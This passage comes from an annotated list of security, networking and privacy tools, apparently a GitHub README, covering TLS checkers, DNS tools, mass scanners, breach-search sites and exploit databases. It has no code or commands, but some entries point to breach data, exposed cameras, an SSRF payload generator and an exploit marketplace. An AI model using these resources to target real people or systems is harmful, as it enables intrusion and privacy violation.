<b><code>&nbsp;21961⭐</code></b> <b><code>&nbsp;&nbsp;2742🍴</code></b> <a href="https://github.com/locustio/locust"><b>locust</b></a></a> - scalable user load testing tool written in Python.<br> </p> ##### :black_small_square: Browsers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.torproject.org/">🌎 <b>TOR Browser</b></a> - protect your privacy and defend yourself against network surveillance and traffic analysis.<br> </p> ##### :black_small_square: Password Managers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://keepassxc.org/">🌎 <b>KeePassXC</b></a> - store your passwords safely and auto-type them into your everyday websites and apps.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://bitwarden.com/">🌎 <b>Bitwarden</b></a> - open source password manager with built-in sync.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?🍴</code></b> <a href="https://github.com/dani-garcia/vaultwarden/"><b>Vaultwarden</b></a></a> - unofficial Bitwarden compatible server written in Rust.<br> </p> ##### :black_small_square: Messengers/IRC Clients <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hexchat.github.io/index.html">🌎 <b>HexChat</b></a> - is an IRC client based on XChat.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pidgin.im/">🌎 <b>Pidgin</b></a> - is an easy to use and free chat client used by millions.<br> </p> ##### :black_small_square: Messengers (end-to-end encryption) <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.signal.org/">🌎 <b>Signal</b></a> - is an encrypted communications app.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wire.com/en/">🌎 <b>Wire</b></a> - secure messaging, file sharing, voice calls and video conferences. All protected with end-to-end encryption.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;919⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;296🍴</code></b> <a href="https://github.com/prof7bit/TorChat"><b>TorChat</b></a></a> - decentralized anonymous instant messenger on top of Tor Hidden Services.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://matrix.org/">🌎 <b>Matrix</b></a> - an open network for secure, decentralized, real-time communication.<br> </p> ##### :black_small_square: Text editors <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.sublimetext.com/3">🌎 <b>Sublime Text</b></a> - is a lightweight, cross-platform code editor known for its speed, ease of use.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://code.visualstudio.com/">🌎 <b>Visual Studio Code</b></a> - an open-source and free source code editor developed by Microsoft.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://atom.io/">🌎 <b>Atom</b></a> - a hackable text editor for the 21st Century.<br> </p> #### Web Tools &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: Browsers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ssllabs.com/ssltest/viewMyClient.html">🌎 <b>SSL/TLS Capabilities of Your Browser</b></a> - test your browser's SSL implementation.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://caniuse.com/">🌎 <b>Can I use</b></a> - provides up-to-date browser support tables for support of front-end web technologies.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://panopticlick.eff.org/">🌎 <b>Panopticlick 3.0</b></a> - is your browser safe against tracking?<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://privacy.net/analyzer/">🌎 <b>Privacy Analyzer</b></a> - see what data is exposed from your browser.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://browserleaks.com/">🌎 <b>Web Browser Security</b></a> - it's all about Web Browser fingerprinting.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.howsmyssl.com/">🌎 <b>How's My SSL?</b></a> - help a web server developer learn what real world TLS clients were capable of.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://suche.org/sslClientInfo">🌎 <b>sslClientInfo</b></a> - client test (incl TLSv1.3 information).<br> </p> ##### :black_small_square: SSL/Security <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ssllabs.com/ssltest/">🌎 <b>SSLLabs Server Test</b></a> - performs a deep analysis of the configuration of any SSL web server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dev.ssllabs.com/ssltest/">🌎 <b>SSLLabs Server Test (DEV)</b></a> - performs a deep analysis of the configuration of any SSL web server.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.immuniweb.com/ssl/">🌎 <b>ImmuniWeb® SSLScan</b></a> - test SSL/TLS (PCI DSS, HIPAA and NIST).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.jitbit.com/sslcheck/">🌎 <b>SSL Check</b></a> - scan your website for non-secure content.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.ssltools.com"><b>SSL Scanner</b></a> - analyze website security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cryptcheck.fr/">🌎 <b>CryptCheck</b></a> - test your TLS server configuration (e.g. ciphers).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://urlscan.io/">🌎 <b>urlscan.io</b></a> - service to scan and analyse websites.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://report-uri.com/home/tools">🌎 <b>Report URI</b></a> - monitoring security policies like CSP and HPKP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://csp-evaluator.withgoogle.com/">🌎 <b>CSP Evaluator</b></a> - allows developers and security experts to check if a Content Security Policy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://uselesscsp.com/">🌎 <b>Useless CSP</b></a> - public list about CSP in some big players (might make them care a bit more).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://whynohttps.com/">🌎 <b>Why No HTTPS?</b></a> - top 100 websites by Alexa rank not automatically redirecting insecure requests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ciphersuite.info/">🌎 <b>TLS Cipher Suite Search</b></a>- cipher suite search engine.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;313⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;133🍴</code></b> <a href="https://github.com/RaymiiOrg/cipherli.st"><b>cipherli.st</b></a></a> - strong ciphers for Apache, Nginx, Lighttpd, and more.<b>*</b><br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://2ton.com.au/dhtool/">🌎 <b>dhtool</b></a> - public Diffie-Hellman parameter service/tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://badssl.com/">🌎 <b>badssl.com</b></a> - memorable site for testing clients against bad SSL configs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tlsfun.de/">🌎 <b>tlsfun.de</b></a> - registered for various tests regarding the TLS/SSL protocol.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://sslmate.com/caa/">🌎 <b>CAA Record Helper</b></a> - generate a CAA policy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ccadb.org/resources">🌎 <b>Common CA Database</b></a> - repository of information about CAs, and their root and intermediate certificates.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://certstream.calidog.io/">🌎 <b>CERTSTREAM</b></a> - real-time certificate transparency log update stream.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://crt.sh/">🌎 <b>crt.sh</b></a> - discovers certificates by continually monitoring all of the publicly known CT.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hardenize.com/">🌎 <b>Hardenize</b></a> - deploy the security standards.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cryptcheck.fr/suite/">🌎 <b>Cipher suite compatibility</b></a> - test TLS cipher suite compatibility.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.urlvoid.com/">🌎 <b>urlvoid</b></a> - this service helps you detect potentially malicious websites.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://securitytxt.org/">🌎 <b>security.txt</b></a> - a proposed standard (generator) which allows websites to define security policies.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;329⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;64🍴</code></b> <a href="https://github.com/mozilla/ssl-config-generator"><b>ssl-config-generator</b></a></a> - help you follow the Mozilla Server Side TLS configuration guidelines.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;&nbsp;24⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;9🍴</code></b> <a href="https://github.com/mjol/TLScan"><b>TLScan</b></a></a> - pure python, SSL/TLS protocol and cipher scanner/enumerator.<br> </p> ##### :black_small_square: HTTP Headers & Web Linters <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://securityheaders.com/">🌎 <b>Security Headers</b></a> - analyse the HTTP response headers (with rating system to the results).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://observatory.mozilla.org/">🌎 <b>Observatory by Mozilla</b></a> - set of tools to analyze your website.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://webhint.io/">🌎 <b>webhint</b></a> - is a linting tool that will help you with your site's accessibility, speed, security, and more.<br> </p> ##### :black_small_square: DNS <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://viewdns.info/"><b>ViewDNS</b></a> - one source for free DNS related tools and information.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnslookup.org/">🌎 <b>DNSLookup</b></a> - is an advanced DNS lookup tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnslytics.com/">🌎 <b>DNSlytics</b></a> - online DNS investigation tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnsspy.io/">🌎 <b>DNS Spy</b></a> - monitor, validate and verify your DNS configurations.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://zonemaster.iis.se/en/">🌎 <b>Zonemaster</b></a> - helps you to control how your DNS works.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://leafdns.com/"><b>Leaf DNS</b></a> - comprehensive DNS tester.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://findsubdomains.com/">🌎 <b>Find subdomains online</b></a> - find subdomains for security assessment penetration test.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnsdumpster.com/">🌎 <b>DNSdumpster</b></a> - dns recon & research, find & lookup dns records.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnstable.com/">🌎 <b>DNS Table online</b></a> - search for DNS records by domain, IP, CIDR, ISP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://intodns.com/">🌎 <b>intoDNS</b></a> - DNS and mail server health checker.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.zonecut.net/dns/"><b>DNS Bajaj</b></a> - check the delegation of your domain.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.buddyns.com/delegation-lab/">🌎 <b>BuddyDNS Delegation LAB</b></a> - check, trace and visualize delegation of your domain.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnssec-debugger.verisignlabs.com/">🌎 <b>dnssec-debugger</b></a> - DS or DNSKEY records validator.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://ptrarchive.com/"><b>PTRarchive.com</b></a> - this site is responsible for the safekeeping of historical reverse DNS records.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://xip.io/"><b>xip.io</b></a> - wildcard DNS for everyone.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nip.io/">🌎 <b>nip.io</b></a> - dead simple wildcard DNS for any IP Address.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ceipam.eu/en/dnslookup.php">🌎 <b>dnslookup (ceipam)</b></a> - one of the best DNS propagation checker (and not only).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://whatsmydns.com">🌎 <b>What's My DNS</b></a> - DNS propagation checking tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://blog.erbbysam.com/index.php/2019/02/09/dnsgrep/">🌎 <b>DNSGrep</b></a> - quickly searching large DNS datasets.<br> </p> ##### :black_small_square: Mail <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://luxsci.com/smtp-tls-checker">🌎 <b>smtp-tls-checker</b></a> - check an email domain for SMTP TLS support.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://mxtoolbox.com/SuperTool.aspx">🌎 <b>MX Toolbox</b></a> - all of your MX record, DNS, blacklist and SMTP diagnostics in one integrated tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.checktls.com/index.html">🌎 <b>Secure Email</b></a> - complete email test tools for email technicians.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.blacklistalert.org/"><b>blacklistalert</b></a> - checks to see if your domain is on a Real Time Spam Blacklist.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://multirbl.valli.org/"><b>MultiRBL</b></a> - complete IP check for sending Mailservers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dkimvalidator.com/">🌎 <b>DKIM SPF & Spam Assassin Validator</b></a> - checks mail authentication and scores messages with Spam Assassin.<br> </p> ##### :black_small_square: Encoders/Decoders and Regex testing <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.url-encode-decode.com/">🌎 <b>URL Encode/Decode</b></a> - tool from above to either encode or decode a string of text.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://uncoder.io/">🌎 <b>Uncoder</b></a> - the online translator for search queries on log data.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://regex101.com/">🌎 <b>Regex101</b></a> - online regex tester and debugger: PHP, PCRE, Python, Golang and JavaScript.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://regexr.com/">🌎 <b>RegExr</b></a> - online tool to learn, build, & test Regular Expressions (RegEx / RegExp).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.regextester.com/">🌎 <b>RegEx Testing</b></a> - online regex testing tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.regexpal.com/">🌎 <b>RegEx Pal</b></a> - online regex testing tool + other tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gchq.github.io/CyberChef/">🌎 <b>The Cyber Swiss Army Knife</b></a> - a web app for encryption, encoding, compression and data analysis.<br> </p> ##### :black_small_square: Net-tools <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://toolbar.netcraft.com/site_report">🌎 <b>Netcraft</b></a> - detailed report about the site, helping you to make informed choices about their integrity.<b>*</b><br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://atlas.ripe.net/">🌎 <b>RIPE NCC Atlas</b></a> - a global, open, distributed Internet measurement platform.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.robtex.com/">🌎 <b>Robtex</b></a> - uses various sources to gather public information about IP numbers, domain names, host names, etc.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://securitytrails.com/">🌎 <b>Security Trails</b></a> - APIs for Security Companies, Researchers and Teams.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tools.keycdn.com/curl">🌎 <b>Online Curl</b></a> - curl test, analyze HTTP Response Headers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://extendsclass.com/">🌎 <b>Online Tools for Developers</b></a> - HTTP API tools, testers, encoders, converters, formatters, and other tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ping.eu/">🌎 <b>Ping.eu</b></a> - online Ping, Traceroute, DNS lookup, WHOIS and others.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://network-tools.com/">🌎 <b>Network-Tools</b></a> - network tools for webmasters, IT technicians & geeks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://bgpview.io/">🌎 <b>BGPview</b></a> - search for any ASN, IP, Prefix or Resource name.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://isbgpsafeyet.com/">🌎 <b>Is BGP safe yet?</b></a> - check BGP (RPKI) security of ISPs and other major Internet players.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://riseup.net/">🌎 <b>Riseup</b></a> - provides online communication tools for people and groups working on liberatory social change.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.virustotal.com/gui/home/upload">🌎 <b>VirusTotal</b></a> - analyze suspicious files and URLs to detect types of malware.<br> </p> ##### :black_small_square: Privacy <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.privacyguides.org/">🌎 <b>privacyguides.org</b></a> - provides knowledge and tools to protect your privacy against global mass surveillance.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://dnsprivacy.org/wiki/display/DP/DNS+Privacy+Test+Servers">🌎 <b>DNS Privacy Test Servers</b></a> - DNS privacy recursive servers list (with a 'no logging' policy).<br> </p> ##### :black_small_square: Code parsers/playgrounds <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.shellcheck.net/">🌎 <b>ShellCheck</b></a> - finds bugs in your shell scripts.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://explainshell.com/">🌎 <b>explainshell</b></a> - get interactive help texts for shell commands.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://jsbin.com/?html,output">🌎 <b>jsbin</b></a> - live pastebin for HTML, CSS & JavaScript, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://codesandbox.io/">🌎 <b>CodeSandbox</b></a> - online code editor for web application development.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://sandbox.onlinephpfunctions.com/"><b>PHP Sandbox</b></a> - test your PHP code with this code tester.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.repl.it/">🌎 <b>Repl.it</b></a> - an instant IDE to learn, build, collaborate, and host all in one place.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.vclfiddle.net/"><b>vclFiddle</b></a> - is an online tool for experimenting with the Varnish Cache VCL.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;8858⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;386🍴</code></b> <a href="https://github.com/hadolint/hadolint"><b>Haskell Dockerfile Linter</b></a></a> - a smarter Dockerfile linter that helps you build best practice Docker images.<br> </p> ##### :black_small_square: Performance <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gtmetrix.com/">🌎 <b>GTmetrix</b></a> - analyze your site’s speed and make it faster.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://performance.sucuri.net/">🌎 <b>Sucuri loadtimetester</b></a> - test here the performance of any of your sites from across the globe.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tools.pingdom.com/">🌎 <b>Pingdom Tools</b></a> - analyze your site’s speed around the world.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pingme.io/">🌎 <b>PingMe.io</b></a> - run website latency tests across multiple geographic regions.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://developers.google.com/speed/pagespeed/insights/">🌎 <b>PageSpeed Insights</b></a> - analyze your site’s speed and make it faster.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://web.dev/">🌎 <b>web.dev</b></a> - helps developers like you learn and apply the web's modern capabilities to your own sites and apps.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;26916⭐</code></b> <b><code>&nbsp;&nbsp;9444🍴</code></b> <a href="https://github.com/GoogleChrome/lighthouse"><b>Lighthouse</b></a></a> - automated auditing, performance metrics, and best practices for the web.<br> </p> ##### :black_small_square: Mass scanners (search engines) <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://censys.io/">🌎 <b>Censys</b></a> - platform that helps information security practitioners discover, monitor, and analyze devices.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.shodan.io/">🌎 <b>Shodan</b></a> - the world's first search engine for Internet-connected devices.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://2000.shodan.io/#/">🌎 <b>Shodan 2000</b></a> - this tool looks for randomly generated data from Shodan.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://viz.greynoise.io/table">🌎 <b>GreyNoise</b></a> - mass scanner such as Shodan and Censys.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.zoomeye.org/">🌎 <b>ZoomEye</b></a> - search engine for cyberspace that lets the user find specific network components.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://netograph.io/">🌎 <b>netograph</b></a> - tools to monitor and understand deep structure of the web.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://fofa.so/">🌎 <b>FOFA</b></a> - is a cyberspace search engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.onyphe.io/">🌎 <b>onyphe</b></a> - is a search engine for open-source and cyber threat intelligence data collected.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://intelx.io/">🌎 <b>IntelligenceX</b></a> - is a search engine and data archive.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://app.binaryedge.io/">🌎 <b>binaryedge</b></a> - it scan the entire internet space and create real-time threat intelligence streams and reports.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://spyse.com/">🌎 <b>Spyse</b></a> - Internet assets registry: networks, threats, web objects, etc.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wigle.net/">🌎 <b>wigle</b></a> - is a submission-based catalog of wireless networks. All the networks. Found by Everyone.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://publicwww.com/">🌎 <b>PublicWWW</b></a> - find any alphanumeric snippet, signature or keyword in the web pages HTML, JS and CSS code.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://inteltechniques.com/index.html">🌎 <b>IntelTechniques</b></a> - this repository contains hundreds of online search utilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hunter.io/">🌎 <b>hunter</b></a> - lets you find email addresses in seconds and connect with the people that matter for your business.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ghostproject.fr/">🌎 <b>GhostProject?</b></a> - search by full email address or username.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.databreaches.live/">🌎 <b>databreaches</b></a> - was my email affected by data breach?<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://weleakinfo.com">🌎 <b>We Leak Info</b></a> - world's fastest and largest data breach search engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pulsedive.com/">🌎 <b>Pulsedive</b></a> - scans of malicious URLs, IPs, and domains, including port scans and web requests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://buckets.grayhatwarfare.com/">🌎 <b>Buckets by Grayhatwarfar</b></a> - database with public search for Open Amazon S3 Buckets and their contents.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://vigilante.pw/">🌎 <b>Vigilante.pw</b></a> - the breached database directory.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://builtwith.com/">🌎 <b>builtwith</b></a> - find out what websites are built with.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://nerdydata.com/">🌎 <b>NerdyData</b></a> - search the web's source code for technologies, across millions of sites.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://zorexeye.com/"><b>zorexeye</b></a> - search for sites, images, apps, softwares & more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.mmnt.net/">🌎 <b>Mamont's open FTP Index</b></a> - if a target has an open FTP site with accessible content it will be listed here.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://osintframework.com/">🌎 <b>OSINT Framework</b></a> - focused on gathering information from free tools or resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.maltiverse.com/search">🌎 <b>maltiverse</b></a> - is a service oriented to cybersecurity analysts for the advanced analysis of indicators of compromise.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://leakedsource.ru/main/">🌎 <b>Leaked Source</b></a> - is a collaboration of data found online in the form of a lookup.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://search.weleakinfo.com/">🌎 <b>We Leak Info</b></a> - to help everyday individuals secure their online life, avoiding getting hacked.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pipl.com/">🌎 <b>pipl</b></a> - is the place to find the person behind the email address, social username or phone number.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://abuse.ch/">🌎 <b>abuse.ch</b></a> - is operated by a random swiss guy fighting malware for non-profit.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://malc0de.com/database/"><b>malc0de</b></a> - malware search engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cybercrime-tracker.net/index.php">🌎 <b>Cybercrime Tracker</b></a> - monitors and tracks various malware families that are used to perpetrate cyber crimes.<br> &nbsp;&nbsp;:small_orange_diamond: <b><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?⭐</code></b> <b><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?🍴</code></b> <a href="https://github.com/eth0izzle/shhgit/"><b>shhgit</b></a></a> - find GitHub secrets in real time.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://searchcode.com/">🌎 <b>searchcode</b></a> - helping you find real world examples of functions, API's and libraries.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.insecam.org/"><b>Insecam</b></a> - the world biggest directory of online surveillance security cameras.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://index-of.es/"><b>index-of</b></a> - contains great stuff like: security, hacking, reverse engineering, cryptography, programming etc.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://opendata.rapid7.com/">🌎 <b>Rapid7 Labs Open Data</b></a> - is a great resources of datasets from Project Sonar.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://webtechsurvey.com/common-response-headers">🌎 <b>Common Response Headers</b></a> - the largest database of HTTP response headers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://labs.inquest.net">🌎 <b>InQuest Labs</b></a> - InQuest Labs is an open, interactive, and API driven data portal for security researchers.<br> </p> ##### :black_small_square: Generators <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://thispersondoesnotexist.com/">🌎 <b>thispersondoesnotexist</b></a> - generate fake faces in one click - endless possibilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://generated.photos">🌎 <b>AI Generated Photos</b></a> - 100.000 AI generated faces.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.fakenamegenerator.com/">🌎 <b>fakenamegenerator</b></a> - your randomly generated identity.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tools.intigriti.io/redirector/">🌎 <b>Intigriti Redirector</b></a> - open redirect/SSRF payload generator.<br> </p> ##### :black_small_square: Passwords <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://haveibeenpwned.com/">🌎 <b>have i been pwned?</b></a> - check if you have an account that has been compromised in a data breach.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.dehashed.com/">🌎 <b>dehashed</b></a> - is a hacked database search engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://leakedsource.ru/">🌎 <b>Leaked Source</b></a> - is a collaboration of data found online in the form of a lookup.<br> </p> ##### :black_small_square: CVE/Exploits databases <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cve.mitre.org/">🌎 <b>CVE Mitre</b></a> - list of publicly known cybersecurity vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.cvedetails.com/">🌎 <b>CVE Details</b></a> - CVE security vulnerability advanced database.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.exploit-db.com/">🌎 <b>Exploit DB</b></a> - CVE compliant archive of public exploits and corresponding vulnerable software.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://0day.today/">🌎 <b>0day.today</b></a> - exploits market provides you the possibility to buy/sell zero-day exploits.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://sploitus.com/">🌎 <b>sploitus</b></a> - the exploit and tools database.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cxsecurity.com/exploit/">🌎 <b>cxsecurity</b></a> - free vulnerability database.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.vulncode-db.com/">🌎 <b>Vulncode-DB</b></a> - is a database for vulnerabilities and their corresponding source code if available.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cveapi.com/">🌎 <b>cveapi</b></a> - free API for CVE data.<br> </p> ##### :black_small_square: Mobile apps scanners <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.immuniweb.com/mobile/">🌎 <b>ImmuniWeb® Mobile App Scanner</b></a> - test security and privacy of mobile apps (iOS & Android).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://vulnerabilitytest.quixxi.com/">🌎 <b>Quixxi</b></a> - free Mobile App Vulnerability Scanner for Android & iOS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ostorlab.co/scan/mobile/">🌎 <b>Ostorlab</b></a> - analyzes mobile application to identify vulnerabilities and potential weaknesses.<br> </p> ##### :black_small_square: Private Search Engines <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.startpage.com/">🌎 <b>Startpage</b></a> - the world's most private search engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://searx.me/">🌎 <b>searX</b></a> - a privacy-respecting, hackable metasearch engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://darksearch.io/">🌎 <b>darksearch</b></a> - the 1st real Dark Web search engine.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.qwant.com/">🌎 <b>Qwant</b></a> - the search engine that respects your privacy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://duckduckgo.com/">🌎 <b>DuckDuckGo</b></a> - the search engine that doesn't track you.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://swisscows.com/">🌎 <b>Swisscows</b></a> - privacy safe web 